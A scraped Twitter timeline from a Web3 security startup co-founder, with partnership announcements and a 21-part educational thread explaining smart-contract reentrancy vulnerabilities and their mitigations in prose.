📢 Collaboration announcement: Inconfido 🤝 Dapper Labs
We are thrilled to reveal that we are working with , through their developer grant, to build security tooling to help protect end users from scams and phishing.
Youssef’s Tweets
Quote Tweet
Our founders @danny_inconfido , @jared_inconfido and @youss_inconfido will be attending @Zebu_live London #Web3 & #Crypto Conference on September 22nd-23rd 2022! If you’re around please come and find us to get to know what we are about and how we’re embedding security into Web3
Show this thread
1
Show this thread
📣The team is super excited to announce a community partnership with to promote #security in Web3 across the UK.
1
5
8
Show this thread
Internet vs. Web - People interchange these two terms, but they’re fundamentally different.
I’ve got a post coming out soon on behalf of covering Web2 vs. Web3, the evolution of Web3, and combatting terms like ‘crypto’ and ‘blockchain’
4
6
Builders just want to build a good product for their users. Often not caring as much about security framework guarantees. Web2 didn’t, Web3 should.
are here to help and guide builders and end users. Let’s make security transparent, flexible, and human readable!
2
2
The importance of threat modeling can't be ignored. There's a decent amount of resources out there for Web2 but no repository of known threat models, attack steps, and associated controls yet for Web3. It's something we're also building (opensource OFC)
1
1
2
Show this thread
Whether it's security architecture support, threat modeling, or secure developer training, we can help you out with that. , and my aim is to suport building a secure Web3, and it starts with the builders. DM us for more info. #security
2
3
Show this thread
Amazing write up of from , , , on how security considerations differ across the development life cycle. We at can support any project with threat modeling and helping you design your smart contracts securely.
Quote Tweet
In web3: security is not only of utmost importance, but also cannot be over-simplified to a checkbox for audit.
To help, @ajbeal, @nassyweazy, @cseifert, and I put together the following guide for thinking about smart contract security at every step 
a16zcrypto.com/smart-contract
a16zcrypto.com/smart-contractShow this thread
1
1
1
Show this thread
Great thread on integer under/overflows by my fellow co-founder . One of goals at is to improve security knowledge within the space. Keep a lookout for similar threads from the team discussing the top threats in Web3 and how you can avoid them.
Quote Tweet
As promised, here's a covering integer under/overflows. Essentially a vulnerability introduced as part of insecure handling of unsigned integers in solidity. To support our community please re-tweet and comment what you think!
covering integer under/overflows. Essentially a vulnerability introduced as part of insecure handling of unsigned integers in solidity. To support our community please re-tweet and comment what you think!Show this thread
The current state of security in Web3 is reminiscent of the early 2000s.
Right now, the focus is getting something built as quickly as possible, and we’re starting to see the consequences of that.
1
1
Web3 needs more standardized Security standards and frameworks, similar to NIST, OWASP, etc. They provide consistency to development practices and a set of best practice controls for each stage of the development lifecycle
2
2
Projects that build securely will do better than projects who rely solely on audits as stamp of “security”
1
1
Bridges are the next big attack vector. We’re already starting to see it with Wormhole, Ronin etc. They are a massive area of concentration and point of failure. Which also means they are a huge target. Keep building securely.
Quote Tweet
Gm fam! 
I think that attacks on cross-chain bridges will become mainstream in the near future. Hackers from North Korea are already looking at them, soon others will follow…
Save this cheatsheet & remember my post above:
Graph.org/Cross-chain-br
I think that attacks on cross-chain bridges will become mainstream in the near future. Hackers from North Korea are already looking at them, soon others will follow…
Save this cheatsheet & remember my post above:
Graph.org/Cross-chain-brShow this thread
1
3
Following on from amazing thread on re-entrancy attacks, i'm preparing one of my own on integer over/underflows.
Let me know what else you want to learn about! The more we can educate about security, the better.
1
1
Sources I’ve used to compile this research include:
medium.com/coinmonks/prot
arxiv.org/pdf/1812.05934
docs.soliditylang.org/en/v0.8.13/sec
docs.openzeppelin.com/contracts/4.x/ (21/21)
1
Show this thread
Our team at aims to enhance security in the #web3security space for both end users and the #web3 builders. We have a strong focus on security education with planned future product releases and consultancy services. (20/21)
1
1
Show this thread
Security Auditing: Although getting your contract security audited does not always guarantee all vulnerabilities will be detected, it is a good way to spot most reentrancy vulnerabilities pre-contract deployment. (19/21)
1
Show this thread
Reentrancy Mitigation Libraries: A good way to prevent same-function and cross-function reentrancy is to use, for example, 's reentrancy guard library which applies a lock to function execution until contract state is updated. (18/21)
1
Show this thread
Code Scanning: Many Solidity smart contract open-source security code scanners exist that can detect reentrancy vulnerabilities. Code scanning should form part of your development lifecycle. Examples of security code scanning tools are Mythril and Manticore. (17/21)
1
Show this thread
Standard send and transfer functions limit the amount of gas so a malicious contract may have less scope for executing complex functions and thus re-entering. (16/21)
1
Show this thread
Another development practice to look out for is the use of send, transfer and call functions which have different constraits on gas limits... (15/21)
1
Show this thread
Secure Solidity Development Practices: A security pattern has already been developed for reentrancy attacks within Solidity documentation. The Checks Effects Interactions Security Pattern is the primary pattern that can be used to disrupt the way reentrancy attacks work. (14/21)
1
Show this thread
There a number of security controls that can be used to mitigate these vulnerabilities within smart contracts and these include... (13/21)
1
Show this thread
The creation of a new contract will cause its constructor to execute and this could be an external call to a malicious smart contract which could then re-enter the original contract and abuse the fact that a variable was not updated by executing another relevant function. (12/21)
1
Show this thread
For this attack to work, the victim smart contract must be creating a new smart contract as part of its function execution before making an update to a state variable. (11/21)
1
Show this thread
Create-based reentrancy: This type of reentrancy vulnerability may be less common due to its nature but it still poses a real risk to smart contracts. (10/21)
1
Show this thread
...invokes the code within that library using a DELEGATECALL instruction. The library smart contract can then be used by a malicious contract to re-enter into the victim contract. (9/21)
1
Show this thread
Delegated reentrancy: Reentrancy attacks do not even have to span one contract. Delegated reentrancy (aka Cross-contract reentracty) occurs when a smart contract uses another smart contract as a library and... (8/21)
1
Show this thread
In this case, the attacking contract reenters using a different function that relies on the same variables that haven’t yet been updated by the initial function. (7/21)
1
Show this thread
Cross-function reentrancy: Reentrancy attacks do not have to span one function within a smart contract, cross-function reentrancy occurs when multiple functions within one contract read from or write to the same internal variables. (6/21)
1
Show this thread
An example of this is the infamous “TheDAO” attack by which an attacker was able to steal 3.6 million ETH using this type of vulnerability. (5/21)
1
Show this thread
There are multiple types of reentrancy vulnerabilities and those include:
Same-function reentrancy: One of the most common reentrancy vulnerabilities, this occurs when the whole attack spans one function within the victim’s smart contract. (4/21)
1
Show this thread
This provides possible paths for malicious smart contracts to manipulate function execution by taking advantage of inconsistent variables to re-excute the same or different functions that make use of inconsistent variables. All of this happens within one transaction. (3/21)
1
Show this thread
Reentrancy is one of the most well-known vulnerabilities in EVM-based smart contracts, yet still frequently missed by developers. At a basic level, #reentrancy occurs when a smart contract allows for the execution of external calls before updating state variables. (2/21)
1
Show this thread
As we’ve seen from the latest attack on Fei Protocol’s Rari Fuse pools, reentrancy vulnerabilities in EVM-based smart contracts are still being widely exploited. Here’s a thread all about reentrancy vulnerabilities & what developers should be doing to protect against them: (1/21)
1
3
2
Show this thread
We also want to know what else you want to hear about! To help spread the awareness, get to the top of our upcoming threads and re-tweet so we can keep educating about security! #security #web3community #smartcontractsecurity
1
Show this thread
Interesting thread on some common attack vectors / threats within DeFi. There is still plenty more, both basic and advance. However, one of the biggest threats is People. The security culture in Web3 is very immature still; we as a community need to do more
Quote Tweet
0/ Many successful heists in DeFi and Web3 have nothing to do with bugs in the code.
If you want to be safe, you need to understand all the ways in which a protocol can be attacked.
Here are 9 attack patterns in DeFi that everyone should know
Here are 9 attack patterns in DeFi that everyone should knowShow this thread
1
2
To be fair Omniscia highlighted the Checks Effects Interactions security pattern, which is a way to mitigate reentrancy attacks. On the other hand, reentrancy should have been explicitly mentioned as a possible threat vector. Also, dev security training is key factor here.
Quote Tweet
1
Great short thread on how Forta monitored the suspicious events. Threat and Vulnerability Management is key for security regardless of Web2 or Web3. Great work . Hope to see future collaboration between you and in the near future!
Quote Tweet
Forta real-time alerts could have prevented the $10 million @saddlefinance hack.
Several early high confidence signals alerted on the attack 
Show this thread
2
2